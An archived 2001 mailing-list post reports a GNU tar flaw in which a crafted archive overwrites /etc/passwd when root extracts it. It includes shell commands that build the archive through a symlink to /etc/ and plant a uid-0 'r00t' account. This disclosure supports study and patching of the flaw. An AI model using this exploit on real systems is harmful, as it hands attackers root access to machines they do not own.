[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Security bug: tar allows to overwrite arbitrary file when extracting
From: |
Mikulas Patocka |
Subject: |
Security bug: tar allows to overwrite arbitrary file when extracting |
Date: |
Mon, 25 Jun 2001 18:11:36 +0200 (CEST) |
Hi
Create tar archive xploit.tar this way:
rm -rf dir
mkdir dir
ln -s /etc/ dir/link
tar cf xploit.tar dir
rm -rf dir
mkdir dir
mkdir dir/link
echo 'r00t:0wn3d:0:0:1337 h4x0r:/:/bin/sh'>dir/link/passwd
tar rf xploit.tar dir
rm -rf dir
Now backup /etc/passwd and extract the archive under root account. No
matter where you are extracting it, extraction will overwite file
/etc/passwd. Tested on linux-2.2.16 and tar-1.13.19.
Is this security bug? Or is it intended behaviour?
Mikulas
- Security bug: tar allows to overwrite arbitrary file when extracting,
Mikulas Patocka <=